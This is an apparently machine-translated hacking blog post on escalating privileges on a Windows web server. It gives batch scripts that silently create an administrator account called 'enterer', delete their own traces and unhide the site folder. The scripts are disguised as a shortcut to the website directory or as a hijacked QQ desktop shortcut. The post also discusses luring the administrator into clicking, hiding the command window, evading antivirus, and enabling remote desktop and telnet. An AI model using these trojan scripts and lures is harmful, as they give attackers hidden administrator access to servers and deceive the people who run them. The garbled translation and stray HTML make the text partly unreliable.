This article can communicate with the author here: http://bbs.2cto.com/read.php? Tid = 120978 Author: enterer
Blog: www.enterer.cn
Reprinted and retained
I recently reviewed the old hacker magazine and found that the previous article using quick hijacking to steal the final exam is very interesting. Because I recently updated my article about server Elevation of Privilege in my blog, I had an idea after reading this article. Why not use this method to increase server Elevation of Privilege.
Create a temp. bat file.
@ Echo off
Net user enterer 123456/add & net localgroup administrators enterer/add
Start c: wwwroot
Attrib "c: wwwroot"-h-s
Del c: phpemp. bat
Del c: wwwroot. lnk
Exit
It means to add an account and open the folder of the website when running a shortcut, and finally remove and delete the hidden attributes of the folder.
This is the default website folder opened by temp. bat running in C: php. It is c: wwwroot and can be modified according to the actual situation.
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/20493V4G-0.jpg); "src =" http://www.bkjia.com/uploads/allimg/131121/20493V4G-0.jpg "onload =" if (this. offline setwidth> 700) this. width = 700; if (this. offline setheight> 700) this. height = 700; "border = 0>
Right-click temp. bat and choose create shortcut. Put the shortcut in the same folder or the previous folder as the website. You can use this method when you fail to raise the permission. You can use a black page or send an email to the Administrator. When the Administrator logs on to the server, he can access our shortcut (which he thinks is the directory of the website), and then he can escalate the permission.
Here is an idea. Don't ask how to hide the website folder, how to remove the shortcut arrow, and so on. Because the shortcut will flash a CMD window, you can consider changing the shortcut to an exe file (there will be no arrows, but there will be a suffix) and changing the running bat to exe or vbs, make the CMD window invisible (you can use tools such as bat2exe ).
Or if you have the permission to modify the desktop shortcut, you will not worry about the Arrow. Change frequently-used programs, such as QQ, to direct to bat files that can run Elevation of Privilege commands and QQ. For example
@ Echo off
Net user enterer 123456/add & net localgroup administrators enterer/add
Start c: qqqq.exe
Exit
This is also a disguised bundle, but it is definitely a no-kill. The command can be used to add an account, open 3389, and run the telnet service. How to induce the Administrator to click is a problem.
The article is a word that may not be used to by everyone. I hope you can read it with patience. Although there is a relatively small chance of privilege escalation, it is a way of thinking.